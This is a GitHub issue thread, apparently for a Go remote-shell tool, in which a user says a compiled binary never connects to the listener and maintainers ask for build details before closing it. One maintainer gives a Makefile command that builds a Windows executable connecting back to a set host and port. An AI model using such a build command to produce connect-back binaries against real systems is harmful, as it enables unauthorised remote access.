Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

The compiled binary does not send request to server #1

Closed
assadabbas opened this issue Jan 18, 2018 · 3 comments
Closed

The compiled binary does not send request to server #1

assadabbas opened this issue Jan 18, 2018 · 3 comments
Assignees
Labels
NotABug wontfix This will not be worked on

Comments

@assadabbas
Copy link

Hi,

I just followed the instructions mentioned in the README and compiled a binary by building it through "go". The binary is generated but running it does not send any request to the server while server is listening on some ip:port.

@phocean
Copy link
Contributor

phocean commented Jan 18, 2018

Hi,

For which platform?
Did you make sure with netcat or something similar that there is not network filtering in between?

Please provide the exact command that you used along with its output.

@lesnuages
Copy link
Contributor

lesnuages commented Jan 18, 2018

@assadabbas Could you please provide us with the following information:

  • for which platform are you trying to build the binary ?
  • for which architecture ?
  • what is the command line you typed (you're mentionning "building it through 'go'")
  • how are you starting your listenning server ?

For your interest, the easiest way is to use the Makefile, like this:

$ make depends && make windows32 LHOST=1.1.1.1 LPORT=2222

This example will create a certifcate, and build a PE32 executable which will connect to 1.1.1.1 on TCP port 2222.

Looking forward to your response.

@lesnuages lesnuages self-assigned this Jan 18, 2018
@lesnuages lesnuages added wontfix This will not be worked on NotABug labels Mar 5, 2018
@lesnuages
Copy link
Contributor

No response, I'm closing this one.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
NotABug wontfix This will not be worked on
Projects
None yet
Development

No branches or pull requests

3 participants